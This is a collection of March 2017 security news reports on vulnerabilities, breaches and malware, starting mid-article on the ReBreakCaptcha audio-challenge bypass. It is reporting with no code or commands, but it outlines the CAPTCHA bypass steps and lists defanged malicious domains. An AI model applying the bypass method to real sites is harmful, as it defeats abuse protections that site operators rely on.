Recognition – Converting the audio challenge audio and sending it to Google’s Speech Recognition API.
Verification – Verifying the Speech Recognition result and bypassing the ReCaptcha.
The ReBreakCaptcha technique uses a way to get an audio challenge as part of the reCaptcha process.
“Some of you may notice that instead of an audio challenge, sometimes you get a text challenge,” reads the blog post published by the East-Ee Security researcher. “To bypass it and get an audio challenge, you simply click the ‘Reload Challenge’ button until you get the correct type.”
Once the ‘get an audio challenge’ option is selectes the reCaptcha allows the users to either play the audio file from the web page or download it.
“Let’s download the audio file and send it to Google Speech Recognition API. Before doing so, we will convert it to a ‘wav’ format, which is requested by Google’s Speech Recognition API. Now we have the audio challenge file and are ready to send it to Google Speech Recognition. How can this be done? Using (Google’s own) API,” continues the post.
Then the author sends the audio to the Speech Recognition that turns back the results in text format.
“We will send the ‘wav’ audio file and the Speech Recognition will send us back the result in a string (e.g. ‘25143’). This result will be the solution to our audio challenge,” East-Ee Security explains.
If you are interested in the ReBreakCaptcha technique, give a look at the Python-based proof of concept script available on GitHub.
High severity bug discovered in CISCO NETFLOW GENERATION APPLIANCE
3.3.2017 securityaffairs Vulnerebility
A flaw in Cisco NetFlow Generation Appliance tracked as CVE-2017-3826, could be exploited by an unauthenticated, remote attacker to cause a DoS condition.
“A vulnerability in the Stream Control Transmission Protocol (SCTP) decoder of the Cisco NetFlow Generation Appliance (NGA) could allow an unauthenticated, remote attacker to cause the device to hang or unexpectedly reload, causing a denial of service (DoS) condition.” reads the Cisco Security Advisory.
NetFlow Generation Appliances are used in enterprise data centers to monitor Gigabit Ethernet high-throughput networks.
According to Cisco, the vulnerability resides in the hardware’s Stream Control Transmission Protocol (SCTP) used by the appliance.
The flaw is due to incomplete validation of SCTP packets being monitored on the Cisco NetFlow Generation Appliance data ports. The attackers can trigger the flaw by sending malformed SCTP packets on a network that is monitored by an NGA data port.
“SCTP packets addressed to the IP address of the NGA itself will not trigger this vulnerability. An exploit could allow the attacker to cause the appliance to become unresponsive or reload, causing a DoS condition. User interaction could be needed to recover the device using the reboot command from the CLI.” continues the advisory.
The bug impacts Cisco NetFlow Generation Appliances NGA 3140, NGA 3240 and NGA 3340.
Cisco this week has released a security patch for its devices and the IT giant confirmed that there are no workarounds to fix the issue. Users need to apply the security update (Cisco NetFlow Generation Appliance Software release 1.1 (1a)) that fixes the bug as soon as possible.
The security patch is not available for the model NGA 3140 because it was dismissed on January 11, 2014.
Researchers spotted a hidden backdoor in Chinese IoT devices from the firm DblTek
3.3.2017 securityaffairs Cyber
Security experts at Trustwave have discovered a hidden backdoor in Internet of Things devices manufactured by the Chinese firm DblTek.
Researchers from Trustwave have discovered a backdoor in IoT devices manufactured by a Chinese vendor that is refusing to fix it.
The backdoored devices are produced by the VoIP firm Dbltek, the researchers speculate the backdoor was introduced for debugging purposes.
The experts discovered that the Telnet interface of the GoIP has an undocumented user, namely “dbladm,” which provides root level shell access on the device. The account is not protected by a password, instead, it is protected by a proprietary challenge-response authentication scheme.
When the attacker tries to Telnet into the device as dbladm, the IoT component tries to connect to UDP port 11000 on 192.168.2.1 on the local network. If the flawed device receives a valid response, it grants access.
“Trustwave recently reported a remotely exploitable issue in the Telnet administrative interface of numerous DblTek branded devices. The issue permits a remote attacker to gain a shell with root privileges on the affected device due to a vendor backdoor in the authentication procedure.” reads the analysis published by Trustwave.
The researchers ethically reported the issue to the IoT vendor, but the manufacturer issued a new firmware with minor changes that leave the access open.
Dbltek then has closed any contact with Trustwave that has continued the analysis of the backdoor and has written the PoC exploits for the backdoors in both the old and new firmware versions.
The flawed firmware is present in almost all Dbltek GSM-to-VoIP devices that are mostly used by small to medium size businesses.
An internet scan for vulnerable devices revealed the existence of hundreds of devices online.
Cloudflare Finds No Evidence of "Cloudbleed" Exploitation
2.3.2017 securityweek Exploit
Cloudflare informed customers on Wednesday that it has found no evidence of the recently discovered memory leak being exploited for malicious purposes before it was patched.
The bug was discovered on February 17 by Google Project Zero researcher Tavis Ormandy. The expert jokingly considered the idea of calling it “Cloudbleed” due to some similarities to HeartBleed and the name stuck.
Cloudflare determined that the bug caused its edge servers to run past the end of a buffer and return memory that contained potentially sensitive information, including cookies and authentication tokens. Ormandy also found that the leaked data included passwords, encryption keys, private messages from dating sites, chat messages, IP addresses and HTTPS requests.
The flaw was introduced in September 2016, but it had the greatest impact between February 13 and February 18, when one in every 3.3 million requests going through Cloudflare’s systems may have resulted in memory leakage. The bug itself was addressed within hours, but it took several days to contain the incident due to the fact that leaked data had been cached by search engines.
In a lengthy blog post published on Wednesday, Cloudflare co-founder and CEO Matthew Prince said that while this was “an extremely serious bug” with a potentially massive impact, an analysis of the logs had turned up no evidence of malicious exploitation. Prince also pointed out that a vast majority of customers were not impacted.
“If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information,” Prince said.
“The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google's Project Zero team and were able to patch it,” he added.
While Cloudflare’s investigation into the Cloudbleed incident continues, to date it has not identified any instances where the leaked memory included passwords, payment card numbers, customer encryption keys, or health records.
It’s worth pointing out that Ormandy, who believed CloudFlare’s initial blog post on Cloudbleed downplayed the risk, did report finding passwords in the leaked data.
“It is not correct to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed,” Prince said. “However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.”
For users who are concerned that their data may have been exposed, a list of potentially affected websites and a simple Chrome app for Mac have been made available.
Online Fraud in the U.S. Grew Dramatically Post-EMV
2.3.2017 securityweek CyberCrime
EMV Payment Card
The introduction of EMV (Europay, MasterCard, Visa) cards, also known as chip-and-PIN cards, into the U.S. has had the expected effect: with card present fraud more difficult, fraudsters have moved to on-line card-not-present fraud. Domestic online fraud became 79% riskier in 2016 than it had been in 2015, according to figures come from the Forter/MRC Fraud Attack Index (PDF).
Forter, which provides a fraud detection system for merchants, teamed with the Merchant Risk Council (which currently has almost 450 member companies in more than 20 countries) to develop a Fraud Attack Index. This is defined as the 'dollars at risk per $100 of sales'. The 'dollars at risk' combines detected and prevented fraud with actual fraud.
The relative simplicity of cloning non-EMV cards made domestic (ie, US) off-line card-present fraud attractive. This is no longer easy. The introduction of more secure EMV cards has driven fraudsters from card-present to card-not-present fraud -- EMV was never going to eliminate fraud, it was merely going to change its nature. This is shown in the fraud attack index for 2016, rising from $2.7 in Q4 2015 to $4.98 in Q4 2016.
Related: EMV Payment Cards - Salvation or Failure?
"Domestic order fraud," explains Forter's CEO Michael Reitblat, "has increased following the adoption of EMV (microchip cards) in the US. The fraudsters who used to steal and copy or counterfeit cards in the US now find that much harder, since card present transactions are increasingly protected by EMV -- and so have moved online instead." He adds that this has been further fueled by an increase in 'friendly fraud' or 'liar-buyer' fraud (where a person might buy an item and then report it undelivered in order to obtain a refund). "That's always been a trend," he said, "but it's increasingly moving from an occasional thing to a serious, serial problem for many retailers."
The greater part of international fraud against US merchants has always been on-line; and is always a higher risk than domestic fraud. In absolute terms, it decreased by 13% compared to 2015 but is still 62.4% riskier than domestic fraud, despite the domestic switch from off-line to on-line fraud within the US. Forter puts the international decrease to a growth in genuine international orders rather than a decrease in fraud.
For online fraud, the criminals need to obtain the victims' payment credentials. Forter notes a shift in account takeover (ATO) against merchant sites to ATO against online payment accounts. "A growing recent trend in the realm of account takeover (ATO)," says the report, "is the use of hacked online payment accounts such as PayPal, ApplePay, AndroidPay etc. In these attacks the fraudster breaks into the victim's account and uses the details there, including payment details, to make purchases and take actions as if they were the victim."
ATO on merchant websites is down 16% on the previous year; ATO on online payment accounts is up 131%.
Forter puts this shift down to improvements in merchants' cyber security combined with the 'unprecedented data breaches of the last few years.' These "included account and password information and this, combined with the fact that many consumers continue to reuse passwords across multiple accounts, has made this form of attack easier to carry out."
"It's an example of the speed at which fraudsters adapt to moves made to stop their attempts," explained Reitblat. "Merchants realized that ATO was a problem, and started guarding against it -- so fraudsters shifted, using similar tactics against online payment accounts, which is far harder for merchants to spot, and which in any event gives them greater scope for theft."
The big target in this shift to online fraud has been clothing -- apparel. Attacks against apparel rose 69.9% over 2016. "This is partly due to fraudsters who are moving online post-EMV continuing to operate in an industry with which they are comfortable," explains Reitblat. With card-present fraud, it is easy to walk into a shop, conduct the fraudulent transaction, and walk out with the clothes.
However, he added that it is also "partly because fraudsters who have been focusing on luxury goods for years (due to the high ROI they represent) are trying a new tactic. Rather than go for the low end of luxury goods (which retailers are now aware that they need to protect and scrutinize, as well as the high-end ones), they're getting equivalent products from apparel sites which are often less careful since they have not traditionally been major targets in the same ways that luxury sites have been."
Robots Vulnerable to Cyberattacks: Researchers
2.3.2017 securityweek Vulnerebility
The software and firmware that bring robots to life are affected by potentially serious vulnerabilities that can allow hackers to remotely take control of the machines, according to an analysis conducted by security firm IOActive.
Robots are increasingly common in homes, businesses, industrial environments, the military and law enforcement, and healthcare organizations. International Data Corporation (IDC) estimated in January that worldwide spending on robotics and related services will reach $188 billion in 2020.
There have been many cases in the past years where people were injured or killed in accidents involving robots, but experts warn that robots could pose a serious threat if they are vulnerable to remote hacker attacks.
IOActive researchers have analyzed home, industrial and business robots from six different vendors: SoftBank Robotics (NAO and Pepper robots), UBTECH Robotics (Alpha 1S and Alpha 2), ROBOTIS (ROBOTIS OP2 and THORMANG3), Universal Robots (UR3, UR5 and UR10), Rethink Robotics (Baxter and Sawyer), and Asratec Corp (V-Sido robot control system).
The researchers have not acquired the actual robots and instead conducted tests on their mobile applications, software and firmware.
IOActive said it identified nearly 50 vulnerabilities in the tested components, but the security firm noted that it did not conduct an in-depth analysis, which suggests that the actual number of weaknesses is likely much higher.
The company has only published a paper providing a non-technical description of the vulnerabilities. Technical details will be made available after vendors have had a chance to address the flaws.
IOActive told SecurityWeek that it has notified all affected vendors, but only four of them have responded so far: SoftBank Robotics, UBTECH Robotics, Universal Robots and Rethink Robotics.
“Just one, SoftBank Robotics, said they were going to fix the issues but without any further details on when and how they are going to do it and what issues they were going to fix,” said Cesar Cerrudo, IOActive’s CTO and one of the paper’s authors. “Then Universal Robots said that our findings were interesting and that they should do something about it without giving any details. The rest haven’t mentioned if they are going to fix the issues or not.”
Robot vulnerabilities and impact
According to IOActive, the robots it has analyzed are affected by various types of vulnerabilities, including problems related to communications, authentication, authorization mechanisms, cryptography, privacy, default configurations, and open source components.
The flaws allow attackers to intercept communications between the robot and the application controlling it, remotely access critical services without a username and password, install malicious software, and extract sensitive information that is not encrypted properly.
Researchers said the vulnerabilities they identified can be exploited for spying via the robot’s camera and microphone, steal personal or business data, and even take control of the machine and cause physical damage or harm.
“Vendors need to start focusing more on security when speeding the latest innovative robot technologies to market or the issue of malfunctioning robots will certainly be exasperated when malicious actors begin exploiting common security vulnerabilities to add intent to malfunction,” Cerrudo said.
Aruba Patches Vulnerabilities in AirWave Product
2.3.2017 securityweek Vulnerebility
HPE-owned network access solutions provider Aruba has patched XML external entity (XXE) and cross-site scripting (XSS) vulnerabilities in its AirWave network management platform.
The vulnerabilities were reported to Aruba by Pichaya Morimoto of SEC Consult and independently by two other researchers. Both weaknesses affect AirWave’s VisualRF component.
The XXE flaw, tracked as CVE-2016-8526, allows a low-privileged user to read files on the system, including ones that could include passwords, which could lead to privilege escalation.
According to Aruba, this security hole is considered low risk on AirWave systems with a single administrator, but the risk increases in environments with users that have different privilege levels.
“The vulnerability can be exploited by a low privileged read-only user to read sensitive information / files with malicious XML code,” SEC Consult said in its advisory. “Note that as Aruba's passwords are encrypted with a shared static key, privilege escalation to admin role is also possible!”
The reflected XSS flaw, identified as CVE-2016-8527, can allow an attacker to obtain sensitive information, such as passwords and session cookies, but they need to trick an AirWave administrator into clicking on a specially crafted link.
The vulnerabilities were reported by SEC Consult in late November 2016 and they were fixed on February 21 with the release of AirWave 8.2.3.1. SEC Consult has classified the flaws as “high impact,” but Aruba has assigned them a “medium” severity rating.
Last year, Google security engineer Sven Blumenstein reported finding more than two dozen vulnerabilities in Aruba products, including ArubaOS, AirWave and Aruba Instant.
This is also not the first time SEC Consult has analyzed Aruba products. As part of its research into the reuse of cryptographic keys, the security firm discovered that Aruba had been using the same certificate for tens of thousands of devices.
Aruba has been running a private bug bounty program on BugCrowd with rewards of up to $1,500 per vulnerability.
Flaws Patched in Siemens RUGGEDCOM NMS Product
2.3.2017 securityweek Vulnerebility
An update released by Siemens for its RUGGEDCOM network management system (NMS) patches a couple of cross-site request forgery (CSRF) and cross-site scripting (XSS) vulnerabilities.
Used in various sectors worldwide, the RUGGEDCOM NMS allows organizations to monitor, configure and maintain their RUGGEDCOM mission-critical networks.
According to advisories published by Siemens and ICS-CERT, the product is affected by flaws that may allow a remote attacker to perform administrative operations.
The CSRF vulnerability, tracked as CVE-2017-2682 and assigned a CVSS score of 8.8, affects the product’s web interface and it can be exploited to get an authenticated user to execute various commands on behalf of the attacker. The attacker needs to trick the targeted user into clicking on a specially crafted link.
The XSS flaw, identified as CVE-2017-2683 and assigned a CVSS score of 6.3, could allow a non-privileged attacker to obtain administrative permissions by getting a user to click on a malicious link.
2017 Singapore ICS Cyber Security Conference Call for Papers is Open
The vulnerabilities affect all versions of the RUGGEDCOM NMS, for both Windows and Linux, prior to 2.1.0. Siemens has advised customers to update their installations to the latest version and configure their environments as specified in the company’s operational guidelines for industrial security.
ICS-CERT said there was no evidence that the flaws had been exploited for malicious purposes.
In recent months, Siemens has also released security updates for SIPROTEC, SCALANCE, Desigo PX, SIMATIC and various other products.
New Malware Will Soon Start "AtomBombing" U.S. Banks
2.3.2017 securityweek Virus
New Dridex 4 Banking Malware With AtomBombing Code Injection is Expected to be Used Against U.S. Banks
A new version of the Dridex banking malware has been detected targeting European banks, and is expected to be used against U.S. financial institutions in the coming months. Dridex 4 incorporates the usual range of software improvements that we have come to expect from professionally maintained malware -- but it is also the first major malware to have adopted the new code injection technique known as 'AtomBombing'.
AtomBombing was described by researchers at enSilo in October 2016. It is so named because of its use of Windows' atom tables -- read/writable stores of data that can be used by multiple applications. Malicious code can be written to the atom tables, and then retrieved and injected into executable memory space.
This process does not require any exploit against Windows since it makes use of a feature provided by Windows. Ultimately, it is simply a new code injection technique likely to by-pass existing AV and NGAV detections.
Dridex 4 was discovered by IBM X-Force in early February. Interestingly, it doesn't implement AtomBombing exactly as described by enSilo. "In our analysis of the new Dridex v4 release," says IBM, "we discovered that the malware's authors have devised their own injection method, using the first step of the AtomBombing technique. They use the atom tables and NtQueueAPCThread to copy a payload and an import table into a RW memory space in the target process. But they only went halfway - they used the AtomBombing technique for the writing of the payload, then used a different method to achieve execution permissions, and for the execution itself."
Since enSilo's original description of the technique, malware defenders will have been developing means to detect it. Dridex 4 hopes to bypass these current detections by using a modified method of AtomBombing. "Malware writers modify their software frequently as part of the cat-and-mouse game played between attackers and defenders," explains F-Secure's Andy Patel. "It doesn't surprise me that the authors of Dridex pulled enSilo's research into their new version so rapidly -- it's a perfect application for that hooking technique. What's even more interesting is that they modified it themselves, thus avoiding any detection techniques that might have been pre-emptively created based on enSilo's findings."
In other words, Dridex 4 was a threat only for so long as it remained undetected. Now that it has been detected and analyzed by IBM, users with fully maintained mainstream anti-malware defenses will rapidly be protected -- until the next new technique. "Defenders will now modify their detection approaches to catch the new techniques found in Dridex, and the cycle will continue," explains Patel.
This disinclination to describe Dridex and AtomBombing as a dangerous new game-changer is echoed by Luis Corrons, technical director at PandaLabs. "The way the attack is performed to inject code is new, although... malware has used malware injection techniques for a long time, for instance you can see that in many ransomware families." It is, he said, "just another technique to be used by malware once it is already in the victim's computer. It is easy to implement, so we'll see it in some other malware attacks; however, from my personal opinion it is not something we have to worry about."
It should be noted that the enSilo researcher who discovered AtomBombing, Tal Lieberman, is not convinced that the Dridex method is purely for evasion. "This adaptation actually simplifies the technique we described. Most likely, the malware authors decided to forego sophistication as they believed that their version is stealthy enough also without increased evasion measures."
Although Dridex is not 'non-malware', it is still "part of the growing trend towards fileless malware," he added, "as that allows the malware to protect itself from the prying eyes of security researchers. The reason is that an executable, once caught by a security solution, is uploaded to the cloud for analysis by security vendors and other security researchers."
The primary threat from Dridex 4 consequently occurred while it was still unknown. The authors knew this, and included improvements to its anti-research and anti-AV capabilities. "In this release," comment the IBM researchers, "we noted that special attention was given to dodging antivirus (AV) products and hindering research by adopting a series of enhanced anti-research and anti-AV capabilities."
Two upgrades given special note by IBM include enhanced encryption, and an updated persistence mechanism. Firstly, it uses a modified naming algorithm. "In the new version, while the same variables are still being used to generate [MD5] hashes, the sequence has changed to shuffle things around and prevent detection by automated checks."
Secondly, Dridex 4 has similarly modified its configuration file encryption. "Overall, Dridex continues to use the same multilayered approach it used in v3 variants, but it has changed and enhanced the encryption while still relying heavily on the RC4 cipher."
The persistence mechanism has been changed. Earlier versions used 'invisibility'. The DLL would only get written to disk with a registry value at shutdown. The new version has adopted a "robustness-over-stealth approach for its persistence mechanism." An executable is now copied, explains IBM, "from system32 into a different directory and Dridex's DLL is placed in that same directory. The malicious DLL mimics a legitimate DLL that's loaded by the executable."
Overall, perhaps the greatest significance of Dridex 4 is not the inclusion of AtomBombing per se, but the speed with which new techniques are incorporated into major malware. It seems that Andy Patel is somewhat surprised that it happened at all. "As for banking trojans in general, we were assuming they'd continue to lose marketshare as banks improved their back end anti-fraud algorithms."
Apps Containing Malicious IFrames Found on Google Play
2.3.2017 securityweek Android
Recent analysis has found 132 Android applications in the official Google Play app store that have been infected with tiny hidden IFrames linking to malicious domains, Palo Alto Networks researchers warn.
The IFrames were found in the applications’ local HTML pages, which is most probably the result of the app developers’ development platforms being infected. According to Palo Alto’s security researchers, the malware infecting these platforms might have been designed to search for HTML pages and inject malicious content at the end of the found pages.
This also means that the mobile malware originated from infected development platforms without developers’ awareness. Previous examples of similar issues include the XcodeGhost compiler malware designed to target iOS and OS X, and the Vpon ad SDK for iOS.
The most popular of the newly discovered infected Android apps had more than 10,000 installs, the researchers note. The Google Security Team was already informed on the matter and all infected apps have been removed from Google Play.
What the infected apps had in common was the use of Android WebView to display static HTML pages, with each page seemingly doing nothing more than loading locally stored pictures and showing hard-coded text. However, the researchers discovered that the actual HTML code included a tiny hidden IFrame linking to well-known malicious domains.
The linked domains were down at the time of investigation, but the security researchers say that one of the infected pages also attempted to download and install a malicious Microsoft Windows executable file (which didn’t execute, since the device wasn’t running Windows). This behavior, however, is classified as Non-Android Threat, a category that includes apps that, although unable to cause harm to the user or Android device, contain components potentially harmful to other platforms.
The infected Android apps were also found to only require Internet permission and to be able to load interstitial advertisements, in addition to the main app. The latter ability, researchers say, instantiates an Android WebView component and displays a local HTML page (the WebView component was also found to have JavaScriptInterface enabled).
The IFrame was hidden in the infected HTML pages either by being tiny (it featured width and height of 1pixel), or by having the display attribute set to None. To ensure that detection based on simple string matching is avoided, the source URLs were obfuscated using HTML number codes, the researchers discovered. Eventually, the linked domains were revealed to be www[.]Brenz[.]pl/rc/ and jL[.]chura[.]pl/rc/, both of which were taken down in 2013 by the Polish CERT (cert.pl), meaning that they are not hosting malware.
The security researchers also discovered a sample that contained entire VBScript injected into the HTML instead. The script contained a Base64-encoded Windows executable, meaning that it didn’t execute on Android. The code was found appended outside the <HTML> tag, meaning that it was an illegal HTML page, but browsers would attempt to render that anyway, for simplicity.
The 132 infected apps were found to belong to seven unrelated developers, though all of them have connections to Indonesia, with a significant number of discovered samples having the word “Indonesia” in their names. The security researchers also note that the HTML files have been infected with malicious IFrames either through file infecting viruses like Ramnit (threats that append IFrames to each HTML file found on compromised hosts) or through an infected IDE.
Palo Alto suggests that the developers are not malicious but victims in this attack, as all samples share similarities in their coding structure, which suggests they may be generated from the same platform, and because the malicious domains used to resolve to sinkholes. The fact that one sample attempts to download a Windows executable is also important, as it shows the attacker does not know about the target platform, which the app developers do.
The researchers warn that an attacker could use this attack method to point to active malicious domains, or could place malicious scripts on the remote server and utilize the JavaScriptInterface to access the infected apps’ native functionality. Thus, the attacker would be able to access all resources within the infected app and could replace them with their own, or could modify the app’s internal logic to add malicious capabilities.
Forged Cookie Attack Affected 32 Million Yahoo Users
2.3.2017 securityweek Attack
The recently disclosed security incident involving forged cookies affected 32 million user accounts, Yahoo said in its annual filing to the U.S. Securities and Exchange Commission (SEC).
Yahoo has suffered several major breaches over the past years, which led to the company slashing the price of the $4.8 billion Verizon acquisition deal by $350 million.
The Internet giant disclosed one of the breaches in September 2016, when it told users that a threat actor, believed to be sponsored by a nation state, had stolen roughly 500 million accounts from its network in late 2014. In December 2016, the company disclosed an even bigger breach, one that occurred in August 2013 and affected one billion accounts.
An investigation also revealed that attackers, believed to be connected to the group behind the 2014 incident, used their access to the company’s systems to forge cookies that allowed them to log into accounts without needing a password. Investigators determined that the forged cookies were used or taken in 2015 and 2016, and the incident affected approximately 32 million accounts.
A probe conducted by outside investigators determined that the 2014 incident was not properly investigated. Yahoo became aware in late 2014 that a suspected state-sponsored actor had exploited the company’s account management tool to access 26 user accounts, but it did not investigate further. Yahoo said in its SEC filing:
“While significant additional security measures were implemented in response to those incidents, it appears certain senior executives did not properly comprehend or investigate, and therefore failed to act sufficiently upon, the full extent of knowledge known internally by the Company’s information security team. Specifically, as of December 2014, the information security team understood that the attacker had exfiltrated copies of user database backup files containing the personal data of Yahoo users but it is unclear whether and to what extent such evidence of exfiltration was effectively communicated and understood outside the information security team. However, the Independent Committee did not conclude that there was an intentional suppression of relevant information.
Nonetheless, the Committee found that the relevant legal team had sufficient information to warrant substantial further inquiry in 2014, and they did not sufficiently pursue it. As a result, the 2014 Security Incident was not properly investigated and analyzed at the time, and the Company was not adequately advised with respect to the legal and business risks associated with the 2014 Security Incident.”
In a blog post published on Tumblr on Wednesday, Yahoo CEO Marissa Mayer said she decided to forgo her annual bonus (up to $2 million) and equity grant (roughly $12 million). Mayer said she expressed her desire to have the bonus distributed to the “company’s hardworking employees, who contributed so much to Yahoo’s success in 2016.”
More than 40 class actions have been filed against Yahoo over the security incidents, and the company said it had spent $16 million by the end of 2016, including on forensics investigations, remediation activities and legal fees.
Slack Quickly Patches Account Hijacking Flaw
2.3.2017 securityweek Vulnerebility
It only took the developers of the Slack team collaboration tool five hours to patch a critical vulnerability that could have been exploited to steal a user’s private token and gain access to their account.
The security hole was identified by Detectify researcher Frans Rosén, who discovered that an attacker can steal a user’s token by getting them to access a specially crafted webpage.
The attack method targeted the xoxs token, which provides complete access to a user’s Slack account. A malicious hacker could have obtained this token by creating a page that reconnected the victim’s Slack WebSocket to their own WebSocket.
The vulnerability was reported by Rosén on February 17 and it was patched by Slack developers within five hours. The researcher, who currently has the second highest number of reputation points in Slack’s HackerOne bug bounty program, has been awarded $3,000 for his work.
Slack said it performed a thorough investigation to ensure that the vulnerability was never exploited for malicious purposes. Rosén has made available detailed technical information and a video demonstrating the attack.
Last year, Detectify warned that many developers had unknowingly leaked their Slack tokens on GitHub, exposing business-critical and other sensitive information. Experts identified more than 1,500 tokens at the time.
Slack has so far paid out more than $200,000 through its bug bounty program, including $9,000 to researcher David Vieira-Kurz for a couple of serious vulnerabilities that could have been leveraged to obtain sensitive information and take over user accounts.
Google Employees Help Thousands Of Open Source Projects Patch Critical ‘Mad Gadget Bug’
2.3.2017 thehackernews Vulnerebility
google-mad-gadget-vulnerability-operation-rosehub-open-source-projects
Last year Google employees took an initiative to help thousands of Open Source Projects patch a critical remote code execution vulnerability in a widely used Apache Commons Collections (ACC) library.
Dubbed Operation Rosehub, the initiative was volunteered by some 50 Google employees, who utilized 20 percent of their work time to patch thousands of open source projects on Github, those were vulnerable to "Mad Gadget vulnerability."
Mad Gadget vulnerability (CVE-2015-6420) is a remote code execution bug in the Java deserialization used by the Apache Commons Collections (ACC) library that could allow an unauthenticated, remote attacker to execute arbitrary code on a system.
The ACC Library is widely deployed by many Java applications to decode data passed between computers. To exploit this flaw, all an unauthorized attacker need to do is submit maliciously crafted input to an application on a targeted system that uses the ACC library.
Once the vulnerable ACC library on the affected system deserializes the content, the attacker could remotely execute arbitrary code on the compromised system, which could then be used to conduct further attacks.
Remember ransomware attack on Muni Metro System? Late last year, an anonymous hacker managed to infect and take over more than 2,000 computers using this same Mad Gadget flaw in the software used to operate San Francisco's public transport system.
Following the public disclosure of the Mad Gadget flaw, almost every commercial enterprise including Oracle, Cisco, Red Hat, VMWare, IBM, Intel, Adobe, HP, Jenkins, and SolarWinds formally disclosed that they had been impacted by this vulnerability and patched it in their software.
However, few months after all big businesses patched the flaw, one of the Google employees noticed that several prominent open source libraries were still depending on the vulnerable versions of ACC library.
"We recognized that the industry best practices had failed. An action was needed to keep the open source community safe. So rather than simply posting a security advisory asking everyone to address the vulnerability, we formed a task force to update their code for them. That initiative was called Operation Rosehub," Justine Tunney, Software Engineer on TensorFlow, wrote on Google Open Source Blog.
Under Operation Rosehub, patches were sent to many open source projects, although the Google employees were only able to patch open source projects on GitHub that directly referenced vulnerable versions of ACC library.
According to the Open Source Blog, if the San Francisco Municipal Transportation Agency's software systems had been open source, Google engineers would also have been able to deliver patches for Mad Gadget to them, and their systems would have never been compromised.
Tor webmail provider Sigaint is unavailable at least since February 11
2.3.2017 securityaffairs Security
Dark net webmail provider For the third consecutive week, the popular Tor web email service SIGAINT is unavailable and the real cause is a mystery.
SIGAINT is one of the largest web email services on the TOR network that is used to send messages preserving the user’s anonymity.
For the third consecutive week, the popular email service is unavailable and the real cause is a mystery.
The service has run for years despite the attempt of law enforcement agencies of deanonymizing its users.
The SIGAINT (sigaintevyh2rzvw.onion) service is constantly under attack of Government agencies, in April 2015 its administrator warned the users of cyber attacks alleged launched by law enforcement agency who tried to hack the service.
In 2015, according to the Administrator, a persistent attacker with access to nearly 70 bad Tor exit nodes (around 6 percent of the total) tried to compromise the email service.
One of the administrators of SIGAINT confirmed that his server was targeted by 58 malicious Tor exit nodes, but a member of the Tor Project, Philipp Winter, discovered other 12 bad exit nodes.
Back to the present, the email provider has been down since at least February 11, and there is no news about what’s happening to the service. Of course, rumors on the Internet are speculating on possible cause of the outage,
“Been happening for a few days actually. Possibly weeks if I didnt notice it. Wanted to check out my email on sigaint, the front abuse page as its named didnt load. So i loaded up wiki and tried out the .onion site and still didnt work.” wrote a Reddit user in a thread titled ‘Cant access sigaint ? ‘. “Tried another day and then another day and still nothing. Im not using bridges or anything, is this happening to more people? Thanks for answers. Wasnt sure where to post this so thought this would be a good place I hope.”
Anyway, even if the Sigaint service is still down, there are many other dark web email providers, below a short list published by freedomhacker.net.
RuggedInbox – s4bysmmsnraf7eut.onion
Torbox –torbox3uiot6wchz.onion
Bitmessage – bitmailendavkbec.onion, clearweb
Mail2Tor – mail2tor2zyjdctd.onion
RiseUp – nzh3fv6jc6jskki3.onion, clearweb
Lelantos – lelantoss7bcnwbv.onion paid accounts only
Autistici – wi7qkxyrdpu5cmvr.onion, clearweb
AnonInbox – ncikv3i4qfzwy2qy.onion paid accounts only
VFEMail – 344c6kbnjnljjzlz.onion, clearweb
Just for curiosity, a Sigaint user is offering 20k to get back it emails.
“Hello friends, back again. Since my original post I have heard from a few others who are on board to put down money in order to get their emails back. I personally would be willing to chip in $10,000 for a download of all my emails from my accounts. Maybe more. There is no question I could get another $10,000 from a few friends who also would want their emails. Maybe more.” reads the user.
“Sigaint if you are reading this and plan to never return, please reach out. Stupidly enough, I pretty much stored my entire life on the Sigaint email. I had thought we would make 3 letter agencies cry forever 🙁
Do you want to stay anonymous as for some reason you cannot show face as Sigaint? Claim to be a hacker who stole the emails from Sigaint and we can use the mods of the hub, tmg, or a market as escrow.”
Nebezpečnou chybu má Internet Explorer i Edge. Záplata chybí
2.3.2017 Novinky/Bezpečnost Zranitelnosti
Národní bezpečnostní tým CSIRT.CZ varoval před chybou, která se týká webových prohlížečů Internet Explorer a Edge. Ta představuje pro uživatele velké riziko především proto, že zatím není k dispozici oprava. Útočníci ji mohou poměrně snadno zneužít.
Trhlina byla objevena v rámci programu Project Zero od společnosti Google. V rámci něj vývojáři pravidelně upozorňují na chyby, které jsou pro uživatele velmi nebezpečné.
Paradoxně tímto krokem ale počítačoví piráti získali návod, jak mohou zranitelnost zneužít. „Google Project Zero zveřejnil zranitelnost v prohlížečích Edge a Internet Explorer včetně části kódu umožňující ověřit existenci této chyby,“ řekl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.
Mohou spustit libovolný kód
„Učinil tak po uplynutí standardní lhůty 90 dní, během níž má výrobce čas na vytvoření záplaty. Zranitelnost má označení CVE-2017-0037 a jejím zneužitím lze způsobit chybu v prohlížeči vedoucí k jeho pádu,“ konstatoval Bašta.
Podle něj nicméně může mít zranitelnost daleko větší dopad na uživatele, než by se mohlo na první pohled zdát. „V detailech zranitelnosti se uvádí i možnost spuštění libovolného kódu,“ zdůraznil bezpečnostní expert.
To jinými slovy znamená, že chybu mohou počítačoví piráti zneužít k tomu, aby propašovali prakticky libovolného záškodníka na cizí počítač. S jeho pomocí pak budou schopni přistupovat k uloženým datům, odposlouchávat internetovou komunikaci či počítač úplně zotročit.
Kdy bude záplata? Zatím se neví...
Podobné kritické chyby se u jednotlivých programů objevují vcelku pravidelně – a to nejen u těch od amerického softwarového gigantu. Zpravidla však o nich jednotlivé společnosti informují až ve chvíli, kdy je pro ně k dispozici odpovídající záplata. Tedy až poté, kdy se mohou uživatelé bránit.
To však v tuto chvíli v případě zranitelnosti prohlížečů Edge a Internet Explorer neplatí. Microsoft zatím neinformoval ani o tom, kdy by měla vyjít aktualizace opravující trhlinu.
Z bezpečnostních důvodů je tak aktuálně vhodnější používat k procházení webových stránek nějaký konkurenční prohlížeč.
WordPress měl kritickou chybu, přes milion webů napadli hackeři
